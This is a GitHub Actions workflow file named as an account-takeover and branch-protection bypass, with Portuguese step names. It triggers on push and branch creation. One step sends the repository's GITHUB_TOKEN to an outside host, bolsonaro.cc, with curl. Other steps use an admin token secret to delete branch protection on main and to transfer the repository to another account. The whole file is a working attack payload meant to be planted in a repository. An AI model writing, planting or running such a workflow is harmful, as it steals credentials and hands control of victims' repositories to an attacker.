name: "ATO & Branch-Protection Bypass"

on:
  create:
    branches: ["main"]
  push:
    branches: ["main"]
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          persist-credentials: true     # usa só para git push, se precisar

      - name: Exfiltra GITHUB_TOKEN
        run: |
          curl -G "https://bolsonaro.cc/collect" \
               --data-urlencode "repo=${{ github.repository }}" \
               --data-urlencode "gtoken=${{ secrets.GITHUB_TOKEN }}"

      # --------- ações que exigem privilégio admin ---------
      - name: Remove branch protection
        env:
          PAT: ${{ secrets.ADMIN_PAT }}
        run: |
          curl -X DELETE \
               -H "Authorization: token $PAT" \
               -H "Accept: application/vnd.github+json" \
               "https://api.github.com/repos/${{ github.repository }}/branches/main/protection"

      - name: Transfer repository ownership
        env:
          PAT: ${{ secrets.ADMIN_PAT }}
        run: |
          curl -X POST \
               -H "Authorization: token $PAT" \
               -H "Accept: application/vnd.github+json" \
               -d '{"new_owner":"bugbounty1337"}' \
               "https://api.github.com/repos/${{ github.repository }}/transfer"
